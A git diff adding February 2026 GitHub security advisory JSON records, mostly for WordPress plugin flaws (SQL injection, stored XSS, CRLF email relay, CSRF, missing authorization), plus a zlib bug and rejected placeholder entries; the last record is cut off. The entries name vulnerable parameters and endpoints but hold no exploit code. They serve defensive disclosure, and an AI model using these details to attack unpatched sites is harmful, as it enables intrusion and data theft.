a/advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json b/advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json new file mode 100644 index 0000000000000..b2bca67c84fe9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fx3v-rgv7-qq3x", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-1277" + ], + "details": "The URL Shortify plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.12.1 due to insufficient validation on the 'redirect_to' parameter in the promotional dismissal handler. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites via a crafted link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1277" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/url-shortify/tags/1.11.4/lite/includes/Promo.php#L64" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3451740%40url-shortify&old=3445491%40url-shortify&sfp_email=&sfph_mail=#file1049" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7c1dc51-47ca-4b2f-9ff9-275bd8b1c106?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json b/advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json new file mode 100644 index 0000000000000..967128fbf512b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json @@ -0,0 +1,80 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4wh-mv47-2hg5", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1304" + ], + "details": "The Membership Plugin – Restrict Content for WordPress is vulnerable to Stored Cross-Site Scripting via multiple invoice settings fields in all versions up to, and including, 3.2.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1304" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L896" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L905" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L914" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L923" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L932" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L941" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L950" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L971" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/templates/invoice.php#L271" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/templates/invoice.php#L281" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3448964%40restrict-content&new=3448964%40restrict-content&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cdd563b7-a1b9-4d99-9a6e-c8acf9dda619?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json b/advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json new file mode 100644 index 0000000000000..1a0c1a1a955a8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g8mp-px4h-fw43", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1714" + ], + "details": "The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution plugin for WordPress is vulnerable to Email Relay Abuse in all versions up to, and including, 3.3.2. This is due to the lack of validation on the 'send_to', 'product_title', 'wlmessage', and 'wlemail' parameters in the 'woolentor_suggest_price_action' AJAX endpoint. This makes it possible for unauthenticated attackers to send arbitrary emails to any recipient with full control over the subject line, message content, and sender address (via CRLF injection in the 'wlemail' parameter), effectively turning the website into a full email relay for spam or phishing campaigns.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1714" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L170" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L189" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L192" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L170" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L189" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L192" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3461704/woolentor-addons/trunk/classes/class.ajax_actions.php?contextall=1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cf326914-6a38-4984-a2a7-66e05f41a96b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-93" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json b/advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json new file mode 100644 index 0000000000000..3f58906b72c53 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcff-gvxv-7jgm", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1931" + ], + "details": "The Rent Fetch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'keyword' parameter in all versions up to, and including, 0.32.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1931" + }, + { + "type": "WEB", + "url": "https://github.com/BrindleDigital/rentfetch/commit/3c7162b24a8be5e5399c1a5bbaf0b949127aca75" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/rentfetch/tags/0.32.4/lib/admin/options-sections/options-general-section.php#L225" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/rentfetch/trunk/lib/admin/options-sections/options-general-section.php#L225" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3458366%40rentfetch&new=3458366%40rentfetch&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3fffdda5-91ed-4b79-bc04-77a1c44e3b67?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json b/advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json new file mode 100644 index 0000000000000..03403a15be506 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ghf8-ggp8-97wj", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27033" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27033" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json b/advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json new file mode 100644 index 0000000000000..c3403ed1b4840 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h858-mf2m-8jf4", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27171" + ], + "details": "zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27171" + }, + { + "type": "WEB", + "url": "https://github.com/madler/zlib/issues/904" + }, + { + "type": "WEB", + "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit" + }, + { + "type": "WEB", + "url": "https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf" + }, + { + "type": "WEB", + "url": "https://github.com/madler/zlib/releases/tag/v1.3.2" + }, + { + "type": "WEB", + "url": "https://ostif.org/zlib-audit-complete" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1284" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json b/advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json new file mode 100644 index 0000000000000..49abac32aeac3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jg87-hjf9-gf64", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27037" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27037" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json b/advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json new file mode 100644 index 0000000000000..a78a994cc52e4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m3jj-4hf6-wgch", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27035" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27035" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json b/advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json new file mode 100644 index 0000000000000..f6fa77ad5c9c7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mcrh-3qmp-x37p", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12356" + ], + "details": "The Tickera – Sell Tickets & Manage Events plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_change_ticket_status' AJAX endpoint in all versions up to, and including, 3.5.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update post/event statuses.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12356" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/tickera-event-ticketing-system/trunk/tickera.php#L3903" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3422813" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e7c08b1a-c73d-488c-96df-cf18acb460bb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json b/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json new file mode 100644 index 0000000000000..6a94e565ad909 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj33-46c7-rm7p", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-2023" + ], + "details": "The WP Plugin Info Card plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2.0. This is due to missing nonce validation in the ajax_save_custom_plugin() function, which is disabled by prefixing the check with 'false &&'. This makes it possible for unauthenticated attackers to create or modify custom plugin entries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2023" + }, + { + "type": "WEB", + "url": "https://github.com/DLXPlugins/wp-plugin-info-card/blob/0fe50d3ccb3d61d5d176fab9e9f280ac8bfd8614/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-plugin-info-card/tags/6.2.0/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-plugin-info-card/trunk/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3454992%40wp-plugin-info-card&new=3454992%40wp-plugin-info-card&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1213a21f-a9c1-4da3-99b5-4a5a0673073f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json b/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json new file mode 100644 index 0000000000000..de9398f896eab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qph2-xm7h-wv73", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-2576" + ], + "details": "The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'payment' parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2576" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.21/includes/controllers/pages/class-checkout.php#L126" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.21/includes/db/class-db-query-set.php#L37" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3463307/business-directory-plugin/trunk/includes/db/class-db-query-set.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8ec7d25-1574-416c-b5fd-3a71b1cc09d2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json b/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json new file mode 100644 index 0000000000000..465c984583a48 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qw9p-rfpx-fxh5", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12075" + ], + "details": "The Order Splitter for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wos_troubleshooting' AJAX endpoint in all versions up to, and including, 5.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view information pertaining to other user's orders.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12075" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3387820%40woo-order-splitter&new=3387820%40woo-order-splitter&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/627eb000-086e-408a-8123-063fed6364be?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json b/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json new file mode 100644 index 0000000000000..889d69c0fb852 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgq3-q5rc-mjc3", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1906" + ], + "details": "The PDF Invoices & Packing Slips for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.6.0 via the `wpo_ips_edi_save_order_customer_peppol_identifiers` AJAX action due to missing capability checks and order ownership validation. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify Peppol/EDI endpoint identifiers (`peppol_endpoint_id`, `peppol_endpoint_eas`) for any customer by specifying an arbitrary `order_id` parameter on systems using Peppol invoicing. This can affect order routing on the Peppol network and may result in payment disruptions and data leakage.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1906" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-pdf-invoices-packing-slips/tags/5.6.0/includes/Admin.php#L72" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-pdf-invoices-packing-slips/tags/5.6.0/includes/Admin.php#L895" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e1922c6-e63b-47aa-97de-1e2382fa25d3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json b/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json new file mode 100644 index 0000000000000..1d82bf0a60c65 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rj4g-w683-5gq4", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1925" + ], + "details": "The EmailKit – Email Customizer for WooCommerce & WP plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the 'update_template_data' function in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the title of any post on the site, including posts, pages, and custom post types.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1925" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.2/includes/Admin/EmailKitAjax.php#L150" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/EmailKitAjax.php#L150" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3456972/emailkit/trunk?contextall=1&old=3419280&old_path=%2Femailkit%2Ftrunk#file1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f131ea1e-d652-4854-abea-6a307ca8118f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json b/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json new file mode 100644 index 0000000000000..016f1de2f6a51 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfcp-69jm-85xv", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27034" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27034" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json b/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json new file mode 100644 index 0000000000000..6df91580455d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrm4-h3r4-hh29", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27031" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27031" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json b/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json new file mode 100644 index 0000000000000..a6b73996ee3fd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpf3-wv8v-2wxj", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12071" + ], + "details": "The Frontend User Notes plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.0 via the 